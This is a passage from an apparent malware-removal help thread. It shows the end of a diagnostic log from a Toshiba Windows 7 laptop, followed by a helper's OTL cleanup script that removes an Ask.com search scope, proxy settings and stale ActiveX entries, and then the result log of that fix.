TOSHIBA HDD/SSD Alert (HKLM\...\{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.64.9 - TOSHIBA Corporation)

Toshiba Laptop Checkup (HKLM-x32\...\NortonPCCheckup) (Version: 2.0.13.11 - Symantec Corporation)

TOSHIBA Media Controller (HKLM-x32\...\{C7A4F26F-F9B0-41B2-8659-99181108CDE3}) (Version: 1.0.87.4 - TOSHIBA CORPORATION)

TOSHIBA Media Controller Plug-in (HKLM-x32\...\{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}) (Version: 1.0.8.0 - TOSHIBA CORPORATION)

Toshiba Online Backup (HKLM-x32\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 2.0.0.31 - Toshiba)

TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.7.9.64 - TOSHIBA Corporation)

TOSHIBA Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.0.4 - TOSHIBA)

TOSHIBA Recovery Media Creator (HKLM-x32\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.5.5109a - TOSHIBA CORPORATION)

TOSHIBA ReelTime (HKLM-x32\...\InstallShield_{24811C12-F4A9-4D0F-8494-A7B8FE46123C}) (Version: 1.7.21.64 - TOSHIBA Corporation)

TOSHIBA Resolution+ Plug-in for Windows Media Player (HKLM-x32\...\{6CB76C9D-80C2-4CB3-A4CD-D96B239E3F94}) (Version: 1.1.2001 - TOSHIBA Corporation)

TOSHIBA Service Station (HKLM-x32\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.2.13 - TOSHIBA)

TOSHIBA Sleep Utility (HKLM-x32\...\{654F7484-88C5-46DC-AB32-C66BCB0E2102}) (Version: 1.4.2.8 - TOSHIBA Corporation)

TOSHIBA Supervisor Password (HKLM-x32\...\InstallShield_{51B4E156-14A5-4904-9AE4-B1AA2A0E46BE}) (Version: 1.63.51.2C - TOSHIBA CORPORATION)

TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.6.1.64 - TOSHIBA Corporation)

TOSHIBA Web Camera Application (HKLM-x32\...\InstallShield_{6F3C8901-EBD3-470D-87F8-AC210F6E5E02}) (Version: 2.0.3.3 - TOSHIBA Corporation)

TOSHIBA Wireless Display Monitor (HKLM-x32\...\{617773AE-ADBA-4479-BB04-65FE7758B35C}) (Version: 1.0.1 - TOSHIBA CORPORATION)

TOSHIBARegistration (HKLM-x32\...\{5AF550B4-BB67-4E7E-82F1-2C4300279050}) (Version: 1.0.9 - TOSHIBA)

TurboTax 2009 (HKLM-x32\...\TurboTax 2009) (Version: - Intuit, Inc)

TurboTax 2010 (HKLM-x32\...\TurboTax 2010) (Version: - Intuit, Inc)

TurboTax 2011 (HKLM-x32\...\TurboTax 2011) (Version: - Intuit, Inc)

TurboTax 2012 (HKLM-x32\...\TurboTax 2012) (Version: 2012.0 - Intuit, Inc)

TurboTax 2013 (HKLM-x32\...\TurboTax 2013) (Version: 2013.0 - Intuit, Inc)

Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden

Utility Common Driver (x32 Version: 1.0.52.3C - TOSHIBA) Hidden

Vacation Quest - Australia (HKLM-x32\...\Vacation Quest - Australia) (Version: - PopCap Games)

Vacation Quest - The Hawaiian Islands (HKLM-x32\...\Vacation Quest - The Hawaiian Islands) (Version: - PopCap Games)

VIO (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.2.5 - WildTangent)

WildTangent Games App (Toshiba Games) (x32 Version: 4.0.5.31 - WildTangent) Hidden

Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)

Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-616022151-183045692-1389677156-1014_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\actxprxy.dll (Microsoft Corporation)

==================== Restore Points =========================

21-10-2014 11:30:56 Windows Update

29-10-2014 12:08:41 ComboFix created restore point

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2014-10-29 07:24 - 00000027 ____A C:\windows\system32\Drivers\etc\hosts

127.0.0.1 localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {0D47314F-7D28-4291-B2F7-26349C2DBD62} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-25] (Google Inc.)

Task: {0E00A6F4-6AF8-4891-833C-F7D740218198} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)

Task: {1C7291B2-B00F-4A00-B58D-EB02BDCD372B} - System32\Tasks\Motorola Device Manager Engine => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2013-10-31] ()

Task: {26EB7565-2E78-46CB-A71F-7BFDDF920FAA} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-23] (Adobe Systems Incorporated)

Task: {30C6312B-D20D-4B19-80F3-88338114D4D7} - System32\Tasks\Motorola Device Manager Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2013-10-31] ()

Task: {5C77D2B6-0EE7-4DAF-9261-28786B2B6AF0} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA => C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe [2012-10-11] (Google Inc.)

Task: {83679F5F-14B5-40E7-96FE-86010A8B8670} - System32\Tasks\MotoCast Update => C:\Program Files (x86)\Motorola Mobility\MotoCast\LiveUpdate\MotoCastUpdate.exe [2012-07-24] ()

Task: {8DF79F42-F157-4588-AA4B-F4A9FE39D589} - System32\Tasks\{E61DD5E1-BD52-2A9D-750F-258FE7FE9D61} => C:\windows\system32\rjlqdrd.dll/s "C:\windows\system32\rjlqdrd.dll"

Task: {8F1BD512-6362-4B0C-B24C-F0DAA617D245} - System32\Tasks\IHSelfDeleteTASK => CMD

Task: {9249EE0A-F432-4A6E-B2EB-7B3E6500E5A2} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core => C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe [2012-10-11] (Google Inc.)

Task: {95F388A7-2F0E-4B5E-897A-7D1D88F0BE4F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-25] (Google Inc.)

Task: {95F41986-FC3B-460D-830A-36DEF2786CCC} - System32\Tasks\TOSHIBA Wireless Display Monitor => C:\Program Files (x86)\TOSHIBA\widimon\widimon.exe [2010-12-25] (TOSHIBA CORPORATION)

Task: {9CE64197-9726-4EE4-A2AB-06FB1895174A} - System32\Tasks\Motorola Device Manager Initial Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2013-10-31] ()

Task: {A09ED212-812F-4E47-B984-C677C9EF3865} - System32\Tasks\Norton 360\Norton Error Analyzer => C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\SymErr.exe [2014-01-30] (Symantec Corporation)

Task: {B0B25AB5-F1A7-4FE4-8248-8DA7BE55EED7} - System32\Tasks\Norton 360\Norton Error Processor => C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\SymErr.exe [2014-01-30] (Symantec Corporation)

Task: {C0249251-0255-46EB-8265-2D06148CE0D5} - System32\Tasks\IHUninstallTrackingTASK => CMD

Task: {F703BE38-C7D6-4051-BF74-D2ED7683E82B} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\WSCStub.exe [2014-09-21] (Symantec Corporation)

Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core.job => C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe

Task: C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA.job => C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2011-05-31 19:32 - 2011-05-31 19:32 - 01501696 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll

2008-09-08 10:19 - 2008-09-08 10:19 - 00022016 _____ () C:\windows\System32\cl31cl6.dll

2011-03-11 16:14 - 2011-03-11 16:14 - 00030064 _____ () c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe

2011-06-27 11:16 - 2011-06-27 11:16 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll

2010-11-18 19:18 - 2010-11-18 19:18 - 11190784 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll

2010-11-30 12:37 - 2010-11-30 12:37 - 00048504 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnZ.dll

2010-03-03 16:15 - 2010-03-03 16:15 - 00019256 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF10.dll

2010-03-03 16:15 - 2010-03-03 16:15 - 00019256 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF11.dll

2010-12-15 17:19 - 2010-12-15 17:19 - 00124320 _____ () C:\Program Files\TOSHIBA\TECO\MUIHelp.dll

2011-05-31 19:32 - 2011-05-31 19:32 - 01501696 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\LIBEAY32.dll

2011-06-09 23:09 - 2011-06-09 23:09 - 00079784 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll

2009-12-09 16:01 - 2009-12-09 16:01 - 00606208 _____ () C:\Windows\Samsung\PanelMgr\SSMMgr.exe

2012-04-16 20:15 - 2007-08-13 03:31 - 00327168 _____ () C:\Windows\Samsung\PanelMgr\caller64.exe

2011-02-22 21:22 - 2011-02-22 21:22 - 00429432 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\TcrdKBB.exe

2014-01-20 14:17 - 2014-01-20 14:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll

2014-01-20 14:16 - 2014-01-20 14:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll

2012-09-07 21:35 - 2012-09-07 21:35 - 00128960 _____ () C:\Program Files (x86)\Motorola Media Link\Lite\liveupdatetactics.dll

2012-09-07 21:35 - 2012-09-07 21:35 - 00024496 _____ () C:\Program Files (x86)\Motorola Media Link\Lite\DbAccess.dll

2012-09-07 21:37 - 2012-09-07 21:37 - 00466256 _____ () C:\Program Files (x86)\Motorola Media Link\Lite\sqlite3.dll

2012-09-07 21:36 - 2012-09-07 21:36 - 00045992 _____ () C:\Program Files (x86)\Motorola Media Link\Lite\NAdvLog.dll

2012-09-07 21:36 - 2012-09-07 21:36 - 00034752 _____ () C:\Program Files (x86)\Motorola Media Link\Lite\NFileCacheDBAccess.dll

2013-10-31 10:05 - 2013-10-31 10:05 - 00172032 _____ () C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\css_core.dll

2012-04-01 22:03 - 2012-04-01 22:03 - 00854016 _____ () C:\windows\assembly\GAC_32\System.Data.SQLite\1.0.61.0__db937bc2d44ff139\System.Data.SQLite.dll

2012-04-02 20:32 - 2012-04-02 20:32 - 00471040 _____ () C:\windows\assembly\GAC_MSIL\Intuit.Spc.Map.Reporter\5.0.104.0__7ce6deabcb36a8ea\Intuit.Spc.Map.Reporter.dll

2012-04-01 22:03 - 2012-04-01 22:03 - 00476520 _____ () C:\windows\assembly\GAC_MSIL\Intuit.Spc.Map.Reporter\5.0.136.0__7ce6deabcb36a8ea\Intuit.Spc.Map.Reporter.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"

MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"

MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"

MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime

========================= Accounts: ==========================

ADH (S-1-5-21-616022151-183045692-1389677156-1014 - Administrator - Enabled) => C:\Users\ADH.Heathman-PC

Administrator (S-1-5-21-616022151-183045692-1389677156-500 - Administrator - Disabled)

Guest (S-1-5-21-616022151-183045692-1389677156-501 - Limited - Disabled)

Heathman (S-1-5-21-616022151-183045692-1389677156-1002 - Administrator - Enabled) => C:\Users\Heathman

HomeGroupUser$ (S-1-5-21-616022151-183045692-1389677156-1009 - Limited - Enabled)

UpdatusUser (S-1-5-21-616022151-183045692-1389677156-1011 - Limited - Enabled) => C:\Users\UpdatusUser.Heathman-PC

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:

==================

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: Local Hostname Heathman-PC.local already in use; will try Heathman-PC-2.local instead

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: ProbeCount 2; will deregister 4 Heathman-PC.local. Addr 192.168.1.69

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Received from 192.168.1.74:5353 4 Heathman-PC.local. Addr 192.168.1.74

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:957A:84DB:03F3:D562

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 4 Heathman-PC.local. Addr 192.168.1.69

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:957A:84DB:03F3:D562

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 4 Heathman-PC.local. Addr 192.168.1.69

Error: (10/29/2014 07:58:45 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: ResolveSimultaneousProbe: 0000000001627F00 Our Record 3 lost: 8A68FECE 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:957A:84DB:03F3:D562

Error: (10/29/2014 07:58:45 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: ResolveSimultaneousProbe: 0000000001627F00 Pkt Record: 8C63CF06 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:B1A4:91C4:8874:7D21

Error: (10/29/2014 07:58:45 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: ResolveSimultaneousProbe: 0000000001627F00 Our Record 3 won: 8A68FECE 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:957A:84DB:03F3:D562

System errors:

=============

Error: (10/29/2014 08:46:07 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)

Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (10/29/2014 07:24:26 AM) (Source: Service Control Manager) (EventID: 7030) (User: )

Description: The PEVSystemStart service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly.

Error: (10/29/2014 07:19:08 AM) (Source: Application Popup) (EventID: 1060) (User: )

Description: \??\C:\ComboFix\catchme.sys has been blocked from loading due to incompatibility with this system. Please contact your software vendor for a compatible version of the driver.

Error: (10/29/2014 07:15:16 AM) (Source: Service Control Manager) (EventID: 7030) (User: )

Description: The PEVSystemStart service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly.

Error: (10/28/2014 10:04:04 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/28/2014 09:21:40 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}

Error: (10/28/2014 09:21:34 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {078AEF33-C48A-49F7-AFF3-A0EE810BFE7C}

Error: (10/28/2014 09:05:28 PM) (Source: WMPNetworkSvc) (EventID: 14349) (User: )

Description: 0x800700b7

Error: (10/28/2014 09:05:28 PM) (Source: WMPNetworkSvc) (EventID: 14353) (User: )

Description: 00x800700b7http://+:10243/WMPNSSv4/2059632502/

Error: (10/28/2014 09:05:28 PM) (Source: WMPNetworkSvc) (EventID: 14349) (User: )

Description: 0x800700b7

Microsoft Office Sessions:

=========================

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: Local Hostname Heathman-PC.local already in use; will try Heathman-PC-2.local instead

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: ProbeCount 2; will deregister 4 Heathman-PC.local. Addr 192.168.1.69

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Received from 192.168.1.74:5353 4 Heathman-PC.local. Addr 192.168.1.74

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:957A:84DB:03F3:D562

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 4 Heathman-PC.local. Addr 192.168.1.69

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:957A:84DB:03F3:D562

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 4 Heathman-PC.local. Addr 192.168.1.69

Error: (10/29/2014 07:58:45 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: ResolveSimultaneousProbe: 0000000001627F00 Our Record 3 lost: 8A68FECE 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:957A:84DB:03F3:D562

Error: (10/29/2014 07:58:45 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: ResolveSimultaneousProbe: 0000000001627F00 Pkt Record: 8C63CF06 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:B1A4:91C4:8874:7D21

Error: (10/29/2014 07:58:45 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: ResolveSimultaneousProbe: 0000000001627F00 Our Record 3 won: 8A68FECE 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:957A:84DB:03F3:D562

CodeIntegrity Errors:

===================================

Date: 2014-10-29 07:19:08.227

Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2014-10-29 07:19:08.086

Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2014-06-15 16:45:26.328

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

Date: 2014-06-15 16:44:42.065

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

Date: 2014-06-15 16:44:41.124

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

Date: 2014-06-15 16:44:41.064

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

Date: 2014-06-15 16:44:40.733

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

Date: 2014-06-15 16:44:40.674

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

Date: 2014-06-15 16:44:40.554

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

Date: 2014-06-15 16:44:40.494

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel® Core i5-2450M CPU @ 2.50GHz

Percentage of memory in use: 37%

Total physical RAM: 8098.69 MB

Available physical RAM: 5057.74 MB

Total Pagefile: 16195.55 MB

Available Pagefile: 12824.47 MB

Total Virtual: 8192 MB

Available Virtual: 8191.85 MB

==================== Drives ================================

Drive c: (TI106332W0C) (Fixed) (Total:449.23 GB) (Free:297.34 GB) NTFS ==>[system with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================

Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 469CBCD6)

Partition 1: (Active) - (Size=1.5 GB) - (Type=27)

Partition 2: (Not Active) - (Size=449.2 GB) - (Type=07 NTFS)

Partition 3: (Not Active) - (Size=15.1 GB) - (Type=17)

==================== End Of Log ============================

Thank you


Fix with OTL

Please re-run OTL with this removal script included.

This fix was created for this user for use on that particular machine.

Running it on another one may cause damage and render the system unstable.

  • Right-click on the OTL icon and select Run as Administrator to start the tool.
  • Under the Custom Scans/Fixes bar in the box paste in the following:

    :Commands
    [createrestorepoint]
    :OTL
    IE:64bit: - HKLM\..\SearchScopes\{3F69DA71-DC06-4D09-BEF6-BC86B2EA700C}: "URL" = http://www.ask.com/w...}&l=dis&o=ushpl
    IE - HKLM\..\SearchScopes\{3F69DA71-DC06-4D09-BEF6-BC86B2EA700C}: "URL" = http://www.ask.com/w...}&l=dis&o=ushpl
    IE - HKU\S-1-5-21-616022151-183045692-1389677156-1014\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
    IE - HKU\S-1-5-21-616022151-183045692-1389677156-1014\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = <local>;192.168.*.*
    O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
    O16 - DPF: {36299202-09EF-4ABF-ADB9-47C599DBE778} https://www.hpwindow...PProdDetect.cab (Reg Error: Key error.)
    O16 - DPF: {49232000-16E4-426C-A231-62846947304B} https://wimpro.cce.h...ads/sysinfo.cab (Reg Error: Key error.)
    O16 - DPF: {73ECB3AA-4717-450C-A2AB-D00DAD9EE203} http://h20270.www2.h...tDetection2.cab (Reg Error: Key error.)
    O16 - DPF: {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Reg Error: Key error.)
    O16 - DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} http://zone.msn.com/...ploader_v10.cab (Reg Error: Key error.)
    O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.ad...Plus/1.6/gp.cab (Reg Error: Key error.)
  • Push Run Fix and wait patiently.
  • If asked to reboot, please allow it to.
  • A notepad window with a logfile will open after this run. It will also be saved in the _OTL\MovedFiles directory on your main drive as (date)_(time).log.
Please include the content of this logfile in your next reply.

OTL Log

========== COMMANDS ==========

Restore point Set: OTL Restore Point

========== OTL ==========

64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{3F69DA71-DC06-4D09-BEF6-BC86B2EA700C}\ deleted successfully.

64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F69DA71-DC06-4D09-BEF6-BC86B2EA700C}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{3F69DA71-DC06-4D09-BEF6-BC86B2EA700C}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F69DA71-DC06-4D09-BEF6-BC86B2EA700C}\ not found.

HKU\S-1-5-21-616022151-183045692-1389677156-1014\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable|dword:0 /E : value set successfully!

HKU\S-1-5-21-616022151-183045692-1389677156-1014\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyOverride| /E : value set successfully!

Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar\\Locked deleted successfully.

Starting removal of ActiveX control {36299202-09EF-4ABF-ADB9-47C599DBE778}

C:\Windows\Downloaded Program Files\HPProdDetect.inf not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{36299202-09EF-4ABF-ADB9-47C599DBE778}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{36299202-09EF-4ABF-ADB9-47C599DBE778}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{36299202-09EF-4ABF-ADB9-47C599DBE778}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{36299202-09EF-4ABF-ADB9-47C599DBE778}\ not found.

Starting removal of ActiveX control {49232000-16E4-426C-A231-62846947304B}

C:\Windows\Downloaded Program Files\sysinfo.inf not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{49232000-16E4-426C-A231-62846947304B}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{49232000-16E4-426C-A231-62846947304B}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{49232000-16E4-426C-A231-62846947304B}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{49232000-16E4-426C-A231-62846947304B}\ not found.

Starting removal of ActiveX control {73ECB3AA-4717-450C-A2AB-D00DAD9EE203}

C:\Windows\Downloaded Program Files\setup.inf not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{73ECB3AA-4717-450C-A2AB-D00DAD9EE203}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73ECB3AA-4717-450C-A2AB-D00DAD9EE203}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{73ECB3AA-4717-450C-A2AB-D00DAD9EE203}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73ECB3AA-4717-450C-A2AB-D00DAD9EE203}\ not found.

Starting removal of ActiveX control {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}\ not found.

